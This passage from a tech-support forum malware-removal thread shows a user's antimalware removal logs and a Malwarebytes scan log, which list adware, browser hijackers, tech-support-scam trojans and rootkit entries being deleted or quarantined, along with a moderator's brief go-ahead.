    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\RegistryDefrag.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\RepairWizard.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\RescueManager.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\SecurityOptimizer.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\SSDTweaker.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\StartupManager.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\StartupOptimizer.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\SystemAdvisor.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\SystemSnapshot.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\UninstallManager.i18n -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Win Tune Pro\Lang -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\LoggerService.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\lua5.1.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\madBasic_.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\madDisAsm_.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\madExcept_.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\main.ini -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\MemoryDefrag.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\MemoryDefragLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\NotifyHelper.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PngComponents170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ProductLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PsComponents.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PsGlobals.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PsLocalizer.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PsSharedForms.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RegCleaner.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RegCleanerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RegDefragLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RegistryDefrag.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RepairWizard.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RescueCenterLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RescueManager.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\rtl170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SDShlExt-x64.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SDShlExt.cfg -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SecurityOptimizer.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SecurityOptimizerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ServiceManagerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Shredder.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SKGL.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SSDTweaker.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\StartupManager.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\StartupManagerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\StartupOptimizer.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SystemAdvisorLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SystemSnapshot.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\TaskSchedulerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Telerik.WinControls.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Telerik.WinControls.UI.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\TelerikCommon.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Uninstall\IRIMG1.JPG -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Uninstall\IRIMG2.JPG -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Uninstall\uninstall.dat -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Uninstall\uninstall.xml -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Win Tune Pro\Uninstall -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\uninstall.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\UninstallManager.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\vcl170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\vclimg170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\vclx170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\VirtualTreesR17.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\WINTUNEPRO.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\WINTUNEPRO.exe.config -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\xmlNative.bpl -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\bing-lavasoft.xml -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\coldsearch.xml -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\smod.xml -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\trovi.xml -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://navsmart.info -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro\Uninstall Win Tune Pro.lnk [LNK@] C:\PROGRA~2\WINTUN~1\UNINST~1.EXE "/U:C:\Program Files (x86)\Win Tune Pro\Uninstall\uninstall.xml" -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro\Win Tune Pro.lnk [LNK@] C:\PROGRA~2\WINTUN~1\WINTUN~1.EXE -> Removed at reboot [2]
    [Tr.DnsPatcher|VT.Unknown][File] C:\Windows\System32\dnsapi.dll -> Replaced at reboot ( @Src Microsoft Cloud)
    [Tr.DnsPatcher|VT.Unknown][File] C:\Windows\SysWOW64\dnsapi.dll -> Replaced at reboot ( @Src Microsoft Cloud)

    ¤¤¤ WMI : 1 ¤¤¤
    [PUP.Yeahbests] instance (ActiveScriptEventConsumer) \ROOT\subscription:ActiveScriptEventConsumer.Name="ASEC" -> Not selected

    ¤¤¤ Hosts File : 0 [Too big!] ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

    ¤¤¤ Web browsers : 1 ¤¤¤
    [PUM.HomePage][FIREFX:Config] jruxmgi6.default : user_pref("browser.startup.homepage", "C:\\ProgramData\\Doubleings\\ff.HP"); -> Not selected

    ¤¤¤ MBR Check : ¤¤¤
    +++++ PhysicalDrive0: HGST HTS725032A7E630 ATA Device +++++
    --- User ---
    [MBR] 43e6003bcfd2cde94fe7410ba59b085c
    [BSP] d0c2410ab3a1197929f155287a951ad9 : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 305243 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK
     
  7. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    That's fine. Go on...
     
  8. photiost

    photiost Established Techie7 Member

    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Scan Date: 18/09/2016
    Scan Time: 8:12 PM
    Logfile: malware scan log1.txt
    Administrator: Yes

    Version: 2.2.1.1043
    Malware Database: v2016.09.18.07
    Rootkit Database: v2016.08.15.01
    License: Trial
    Malware Protection: Enabled
    Malicious Website Protection: Enabled
    Self-protection: Disabled

    OS: Windows 7 Service Pack 1
    CPU: x64
    File System: NTFS
    User: Administrator

    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 545068
    Time Elapsed: 22 min, 33 sec

    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    Processes: 5
    Rogue.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.exe, 1776, Delete-on-Reboot, [9a05046f85151b1b2b9f04eb8e76ba46]
    DDoSTool.Agent, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, 3908, Delete-on-Reboot, [e0bf9ed58e0c02343892308c0afac43c]
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.exe, 3148, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46]
    PUP.Optional.DesktopFind, C:\ProgramData\desktopfindkey\desktop189.exe, 1616, Delete-on-Reboot, [7b24aec5f5a56acc684eedf161a302fe]
    PUP.Optional.TempLaunch, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, 3908, Delete-on-Reboot, [a8f7155e1c7e48ee1334a328788a669a]

    Modules: 0
    (No malicious items detected)

    Registry Keys: 104
    Rogue.TechSupportScam, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\nrtService, Quarantined, [9a05046f85151b1b2b9f04eb8e76ba46],
    Adware.Kajajugt, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\TYPELIB\{14EF423E-3EE8-44AE-9337-07AC3F27B744}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\INTERFACE\{A9582D7B-F24A-441D-9D26-450D58F3CD17}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\INTERFACE\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{A9582D7B-F24A-441D-9D26-450D58F3CD17}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{A9582D7B-F24A-441D-9D26-450D58F3CD17}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{14EF423E-3EE8-44AE-9337-07AC3F27B744}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{14EF423E-3EE8-44AE-9337-07AC3F27B744}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}, Quarantined, [752acca7059565d17355ddba55ade11f],
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}, Quarantined, [faa5cda632688ea8b0bb3d5ac04224dc],
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}, Quarantined, [faa5cda632688ea8b0bb3d5ac04224dc],
    PUP.Optional.ConvertAd, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\PopupProduct, Quarantined, [4b54a2d1afebb58128a7a6f692718080],
    PUP.Optional.WizzWifiHotspot, HKLM\SOFTWARE\Wizzwifihotspot, Quarantined, [f1aed79c42581f174059db1fc0436a96],
    PUP.Optional.VBates.Gen, HKLM\SOFTWARE\ICATTI, Quarantined, [712ecda69505da5c6641e7129e65a35d],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\CLASSES\PCSU.Registry, Quarantined, [5946244f732721150c0d01ae04ffcf31],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\CLASSES\PCSU.Registry.1, Quarantined, [e4bb88eb8e0caa8cf029cae58083926e],
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [9b043e35c6d42016d59505c41fe3a55b],
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2F23AB71-4AC6-41F2-A955-EA576E553146}, Quarantined, [504feb88fd9dbe7844265871c141a55b],
    PUP.Optional.EasyHotSpot, HKLM\SOFTWARE\MICROSOFT\TRACING\easyhotspot-installer_RASAPI32, Quarantined, [7926294a2377e452218c609ddf24ca36],
    PUP.Optional.EasyHotSpot, HKLM\SOFTWARE\MICROSOFT\TRACING\easyhotspot-installer_RASMANCS, Quarantined, [a4fb5f14e6b47cba7e2f3bc243c0d927],
    PUP.Optional.IDSCProduct, HKLM\SOFTWARE\MICROSOFT\TRACING\idscservice_RASAPI32, Quarantined, [ccd3e09388128ea8a90cc3383dc6b749],
    PUP.Optional.IDSCProduct, HKLM\SOFTWARE\MICROSOFT\TRACING\idscservice_RASMANCS, Quarantined, [6e31e3902d6d88aea2132dce8b78f010],
    PUP.Optional.WizzCaster, HKLM\SOFTWARE\MICROSOFT\TRACING\wizzcaster_RASAPI32, Quarantined, [5c43551e6c2e280ec548ce30976c7c84],
    PUP.Optional.WizzCaster, HKLM\SOFTWARE\MICROSOFT\TRACING\wizzcaster_RASMANCS, Quarantined, [821d284ba7f348ee27e6a85660a3c739],
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR , Quarantined, [4a5597dc4a50b87e5bdfaa0f31d24db3],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, Quarantined, [188721529ffbf24411f46678de2557a9],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, Quarantined, [eab5660dceccdd59e125cf0fe2214bb5],
    PUP.Optional.TTWifi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11B0901B-7817-4D91-9457-0870BE557C0A}, Delete-on-Reboot, [118e0a69c8d2ec4af7812ecf10f38977],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11E0260B-A1B3-4C76-92FB-E4E45BBE5BA6}, Delete-on-Reboot, [2a7580f38317c76f50706e83f50e7f81],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{20CC1331-B6C8-4E07-87C2-17BBB66FF2E6}, Delete-on-Reboot, [f0afa3d0ff9b66d0ae0f1addcc37dd23],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{33AA5276-F186-4F36-B614-FACEF7D12B73}, Delete-on-Reboot, [e5ba482beab0ee48358a40b13dc6a957],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4DFEE54D-5A75-4674-9599-2CF0C1235984}, Delete-on-Reboot, [455ae291bddd65d1734d9c55956ead53],
    Trojan.TechSupportScam, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4F4D22B5-7496-4CF9-9984-12320C3EEE6C}, Delete-on-Reboot, [514e3a394753fe382dff2ac55fa57789],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5AECB8E6-6A1D-4416-A94E-63AB73367CB3}, Delete-on-Reboot, [eeb1dc974c4e0333bd02826f9370c53b],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9CF158C5-EBBF-4534-947A-C011B643E9A5}, Delete-on-Reboot, [029de98acfcb6bcbe6d99e5331d260a0],
    PUP.Optional.SearchProtect.Gen, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B4C9453B-5317-4006-9B25-BD4D32EE1256}, Delete-on-Reboot, [9f00e390356572c4c20a2ecb3cc77a86],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{EBD0F564-06A8-4CFE-8FF2-6C151538BA74}, Delete-on-Reboot, [e7b8abc86b2feb4bee8001ee25de12ee],
    PUP.Optional.TempLaunch, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F3A5846C-8CA4-4CEF-8D20-35484B32105D}, Delete-on-Reboot, [9c032e457b1f4ee8a0a8b318738f39c7],
    PUP.Optional.SearchProtect.Gen, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\bvyvcvd, Delete-on-Reboot, [b2ede78c2c6e93a36f5e9c5d4bb86799],
    Trojan.TechSupportScam, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\nerta, Delete-on-Reboot, [900fe2911f7bdc5a84a9d81709fb8f71],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\PC SpeedUp Service Deactivator, Delete-on-Reboot, [920d0e658614c6706bb2eac5a1624cb4],
    PUP.Optional.TempLaunch, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Pritc, Delete-on-Reboot, [5a453142940680b600497a51bc466898],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SMW_P, Delete-on-Reboot, [3b64195acad0280efac45c9b52b17789],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\System Healer Task, Delete-on-Reboot, [9f00096a544639fd0ea08a50ff043ac6],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\System HealerPeriod, Delete-on-Reboot, [2976f380abef1a1cf5b9a5352ad927d9],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\System HealerStartUp, Delete-on-Reboot, [c5da0d664d4d4aec7e30d703e91a7f81],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SystemHealer Monitor, Delete-on-Reboot, [524d6b083d5dfe3899167961ff0422de],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SystemHealer Run Delay, Delete-on-Reboot, [910ef083ff9bb5812788ca100af9748c],
    PUP.Optional.TTWifi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ttwifi, Delete-on-Reboot, [b6e9e68d2a70e94d1c5de815e221c13f],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE, Quarantined, [dac53b38b5e57bbbaf4c797d5aa91de3],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\SEARCHMODULE\INFO, Quarantined, [7c237003ddbdf2440466427e38cb6d93],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\mtDoubleing, Quarantined, [b9e64a296b2f7bbbfd2d0dec25de5ca4],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\mtRonzap, Quarantined, [58479fd4f9a13ff70f37d52148bbf709],
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\WOW6432NODE\Tutorials, Quarantined, [d1cec0b32773270f90369f2cfa0a619f],
    PUP.Optional.VBates.Gen, HKLM\SOFTWARE\WOW6432NODE\ICATTI, Quarantined, [f3acdf94a6f4ce68b0f7708908fbf50b],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\WOW6432NODE\CLASSES\PCSU.Registry, Quarantined, [abf47201cdcdfa3cfd1cab04917231cf],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\WOW6432NODE\CLASSES\PCSU.Registry.1, Quarantined, [a2fddf942d6d9f97cb4e456aba49b14f],
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\IELNKSRCH, Quarantined, [dec12e453c5e80b6c8565d9730d348b8],
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [653a40332773bf779cce5c6dec16bf41],
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2F23AB71-4AC6-41F2-A955-EA576E553146}, Quarantined, [247b78fbbae07fb7cb9ffbced9291ee2],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASAPI32, Quarantined, [5a45690a4555da5cf2b326cf6a9902fe],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASMANCS, Quarantined, [871893e0009a3ff7e0c58570c93a7c84],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Doubleing_RASAPI32, Quarantined, [c2dd393a6d2d7abc43e543b66e9557a9],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Doubleing_RASMANCS, Quarantined, [9708ec87702a5bdbde4a14e5e221ed13],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\PCSUSpeedTest_RASAPI32, Quarantined, [3e619fd42773b680fb1cfbc647bcdc24],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\PCSUSpeedTest_RASMANCS, Quarantined, [b2ed175c0e8c89ad080fd0f1867d52ae],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Ronzap_RASAPI32, Quarantined, [811ecca7edadd56168606c89788b1be5],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Ronzap_RASMANCS, Quarantined, [d6c96b0861392c0a3a8eda1b34cf669a],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Doubleing.exe, Quarantined, [dbc4e78c55452a0c9b8e24d5ee15af51],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Ronzap.exe, Quarantined, [346b2f44c8d2ca6c51ae01f4b74ce41c],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE, Quarantined, [455a4e256e2c64d2cd2ee90ddc271ee2],
    PUP.Optional.MySearch123, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}, Quarantined, [c4dbcca7f1a931058f55ad2d43c07888],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SEARCH MODULE, Quarantined, [732cfd76f4a6df57629ae1151ae95ca4],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SEARCHPROTECT, Quarantined, [b6e90271ff9bdc5a7c8f5886c63db64a],
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{05019CFB-8FF6-4F88-8E9E-CF5E6A1AA38D}, Quarantined, [b9e6086b7c1e88ae127ab2f6d82be21e],
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{1E1BF6F8-9785-45A5-9821-DF846308BE9F}, Quarantined, [4857bcb76b2fae88d7b56d3bde2505fb],
    PUP.Optional.SearchModule, HKLM\SOFTWARE\WOW6432NODE\SEARCHMODULE\SMUpd, Quarantined, [fea183f0a9f19e98d2ad298a877c3ec2],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SEARCHPROTECT, Quarantined, [514e561d5c3e1e1827e516c8e51e23dd],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SPPDCOM, Quarantined, [1788c6adc3d7082e29e4f8e64db6c33d],
    Rootkit.Komodia.PUA, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\MINIMAL\bsdpf64.sys, Quarantined, [b7e8d89b2575a294f48f6e8e7a89c23e],
    Rootkit.Komodia.PUA, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\MINIMAL\bsdpr64.sys, Quarantined, [4b54b2c1940655e1a3e28b7109fa5ea2],
    Rootkit.Komodia.PUA, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\NETWORK\bsdpf64.sys, Quarantined, [f9a674ff45551f177215fc0014ef639d],
    Rootkit.Komodia.PUA, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\NETWORK\bsdpr64.sys, Quarantined, [742bfa79ebaf22148702dd1f30d317e9],
    PUP.Optional.Shopperz, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\bsdpf64, Quarantined, [e3bc0b6871293afce26e906cbd46916f],
    PUP.Optional.Shopperz, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\bsdpr64, Quarantined, [217e7ff4633749ed143dfb010cf76c94],
    PUP.Optional.ConduitSearchProtect, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\CltMngSvc, Quarantined, [4d52165dbdddd561684ff684bd4643bd],
